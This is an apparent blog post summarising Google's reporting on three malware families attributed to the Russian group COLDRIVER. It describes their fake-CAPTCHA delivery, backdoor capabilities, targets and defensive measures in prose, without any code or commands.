Google Identifies Three New Russian Malware Families Created by COLDRIVER Hackers

on

 

Google Identifies Three New Russian Malware Families Created by COLDRIVER Hackers

In late October 2025, Google Threat Intelligence Group (GTIG) published a detailed analysis of a rapidly evolving malware campaign tied to the Russian state‑aligned hacking group known as COLDRIVER — also tracked under various aliases including Star Blizzard, Callisto, and UNC4057. This unprecedented disclosure sheds light on three new malware families attributed to the group, highlighting not only their adaptive technical development but also the escalating pace and sophistication of Russian cyber espionage operations targeting high‑value individuals and organizations. Google Cloud+1

The identified malware — NOROBOT, YESROBOT, and MAYBEROBOT — represent a shift in the group’s tactics, moving from simpler credential theft and phishing campaigns toward robust backdoor infrastructure designed for persistent access, command execution, and ongoing intelligence collection. The discovery underscores both the resilience and innovation of COLDRIVER’s operations, as the group was able to retool within five days of public disclosure of its previous LOSTKEYS malware and accelerate its operational tempo. Google Cloud

Who Is COLDRIVER? A Persistent Russian Cyber Threat

Before examining the new malware families, it’s essential to understand the group behind them.

COLDRIVER is a Russia‑linked advanced persistent threat (APT) group that has been active over multiple years conducting espionage, credential harvesting, and targeted attacks. U.S. and private sector threat analysts have long tied the group to Russian intelligence interests, particularly those aligned with the Federal Security Service (FSB) and other state organs. The group’s past campaigns have focused on high‑profile individuals, including non‑governmental organization (NGO) advisors, policy advisors, dissidents, and diplomats — especially those connected to NATO countries, Ukraine, and Western policy circles. The Record from Recorded Future

Historically, COLDRIVER’s operations relied heavily on phishing and credential theft, with early malware such as LOSTKEYS being identified in 2025 as a file‑stealing implant delivered via deceptive ClickFix‑style lures. This method used fake CAPTCHA pages to convince victims to execute PowerShell commands that would download and run malicious scripts, allowing attackers to exfiltrate files and system information. Cyware

However, following the public exposure of LOSTKEYS in May 2025, the group demonstrated remarkable agility by abandoning the compromised tool and quickly rolling out a new suite of malware families with more sophisticated capabilities and stealth. Google Cloud

The Three New Malware Families: NOROBOT, YESROBOT, and MAYBEROBOT

1. NOROBOT: The Sophisticated Loader DLL

The first component in the new malware chain is NOROBOT — a malicious Dynamic Link Library (DLL) that functions as a downloader and loader for subsequent payloads. Unlike earlier scripts that relied on multi‑stage PowerShell, NOROBOT is delivered via a DLL executed through rundll32, often after a user is tricked into visiting a page disguised as a CAPTCHA check.

In many cases, COLDRIVER’s delivery mechanism starts with a lure called COLDCOPY “ClickFix”, which uses social engineering text such as “I am not a robot” to convince a user to download and run NOROBOT. The DLL then contacts hard‑coded command‑and‑control (C2) servers to retrieve and prepare the next stage payload. Google Cloud

NOROBOT itself has undergone extensive evolution since its discovery, with variants that initially incorporated split cryptography keys to hamper analysis and later simplified versions designed for ease of deployment and evasion. Earlier versions even fetched and installed a full Python runtime to support the next stage — a noisy indicator that was later abandoned as the toolchain became cleaner and stealthier. Google Cloud

2. YESROBOT: A Python‑Based Interim Backdoor

The earliest malware that NOROBOT delivered was YESROBOT, a Python‑based backdoor. While effective in enabling command execution, YESROBOT proved cumbersome for both deployment and detection evasion because it required a full Python 3.8 installation to operate — a footprint that greatly increased its visibility to defenders. This made it less ideal for prolonged, covert operations. Google Cloud

YESROBOT’s functions were limited to remote execution and basic control, but it served as an important proof-of-concept for COLDRIVER’s evolving toolchain. Its reliance on Python made it a logical intermediate step in the group’s transition toward more flexible backdoors. Google Cloud

3. MAYBEROBOT: A Flexible PowerShell Backdoor

By early June 2025, COLDRIVER began deploying MAYBEROBOT instead of YESROBOT. This new backdoor — also tracked by some vendors as SIMPLEFIX — was written in PowerShell and provided a lightweight yet extensible command‑and‑control interface. MAYBEROBOT offers three primary capabilities:

  1. Download and execute files from a specified URL.

  2. Execute arbitrary commands via cmd.exe.

  3. Execute specified PowerShell blocks.
    Communication with C2 infrastructure involves acknowledgments and, where appropriate, output of executed commands. Google Cloud

This tool’s design makes it much easier to extend functionality via remote control commands while keeping the malware footprint relatively small and less likely to trigger detection engines. By relying on PowerShell — a common administrative tool on Windows systems — MAYBEROBOT blends into normal system operations, making it harder to differentiate malicious traffic from legitimate activity. SC Media

Delivery Mechanisms: ClickFix and Rundll32

Across the new malware families, COLDRIVER continued to use social engineering lures that draw victims into executing malicious DLL files. The ClickFix style lure typically presents a fake CAPTCHA prompt, claiming the user must verify they are human before proceeding — a common tactic designed to bypass suspicion.

Once a user interacts with the lure, the malware leverages Windows’ rundll32.exe process to load NOROBOT, which then pulls down further stages like MAYBEROBOT from C2 servers. This approach mirrors past campaigns where malicious content was disguised behind seemingly innocuous frontends, but the technical implementation now combines DLL loading and obfuscated backdoor scripting to evade detection. Google Cloud

The deliberate use of DLLs — rather than scripts — complicates forensic analysis, since malicious code can be embedded in binaries that look innocuous and are invoked through standard OS tools. The layered approach, with NOROBOT acting as a downloader and other families executing backdoor logic, also ensures modularity in the malware ecosystem, making detection and takedown more challenging. Securonix

Operational Tempo and Evolutionary Dynamics

One of the striking insights from Google’s report is how rapidly COLDRIVER responded to public exposure of its previous malware. Within just five days of the disclosure of LOSTKEYS in May 2025, the group had already begun deploying NOROBOT and the associated robotic‑themed malware families. Google Cloud

Security researchers have noted that COLDRIVER’s development tempo — the speed at which it iterated and evolved its malware — has increased compared to prior campaigns. NOROBOT, YESROBOT, and MAYBEROBOT underwent multiple revisions between June and September 2025, with each iteration balancing stealth, flexibility, and ease of deployment. Securonix

This dynamic evolution illustrates a broader trend among state‑aligned threat actors: when one tool is exposed, they do not simply abandon operations but instead pivot quickly to new serviceable tools, often with improved capabilities and evasion techniques. The Hacker News

Targets and Strategic Implications

COLDRIVER’s attack campaigns have historically focused on individuals and organizations of strategic interest to Russia, including:

  • Government and military personnel.

  • Policy advisors and think tanks in NATO countries.

  • Non‑governmental organizations (NGOs) dealing with democracy, human rights, and geopolitical affairs.

  • Journalists and civil society actors advocating against Russian state narratives. The Record from Recorded Future

The shift toward custom backdoor malware, and away from simpler credential phishing, indicates an increased emphasis on secure, persistent access and the ability to execute complex commands or exfiltrate data without detection.

The ROBOT‑themed naming convention (NOROBOT, YESROBOT, MAYBEROBOT) appears deliberate, reflecting both the malware’s technical pipeline and a broader campaign identity. Each malware family plays a role in building and maintaining covert access within compromised environments, facilitating long‑term espionage. LinkedIn

Detection, Mitigation, and Defense Measures

In response to these developments, Google incorporated IOCs (indicators of compromise) and behavior‑based detection logic into Safe Browsing and anti‑malware protections across its products, including Chrome and Gmail. Targeted alerts were also sent to high‑risk users through government‑backed attacker warnings to encourage enhanced browsing protections and up‑to‑date system hygiene. Google Cloud

Proactive Defense Strategies

To defend against this evolving threat landscape, organizations should consider:

  • Enhanced email security to block phishing and social engineering lures.

  • Endpoint detection and response (EDR) tools to monitor for suspicious DLL loading and PowerShell execution.

  • Network intrusion detection systems (NIDS) configured to spot unusual C2 traffic patterns.

  • Multi‑factor authentication (MFA) to limit credential misuse even if initial compromise occurs.

  • User awareness training focused on deceptive lures like fake CAPTCHA prompts.

Threat Intelligence Sharing

Security teams should also leverage shared threat intelligence feeds that include IOCs and malicious domain lists as published by Google and the broader research community. Rapid sharing among defenders can help contain emerging campaigns much earlier in their lifecycle. NetmanageIT CTO Corner

Looking Ahead: Cyber Espionage in 2026 and Beyond

The rapid emergence of three new malware families within months of exposing an older strain suggests that COLDRIVER — and likely other state‑aligned groups — is doubling down on flexible malware development and adaptive delivery techniques designed to evade detection while maximizing operational persistence.

This incident also reinforces the importance of industry transparency and collaboration. Public disclosures by major technology firms like Google significantly raise the bar for defensive readiness and give defenders crucial visibility into threat actor capabilities before these tools can be widely exploited. Securonix

As geopolitical tensions continue to drive cyber espionage activities, organizations in sensitive sectors — including government, defense, civil society, and think tanks — must remain vigilant, prioritizing both technical defenses and human‑centric safeguards to withstand increasingly agile malware campaigns.

Comments

Post a Comment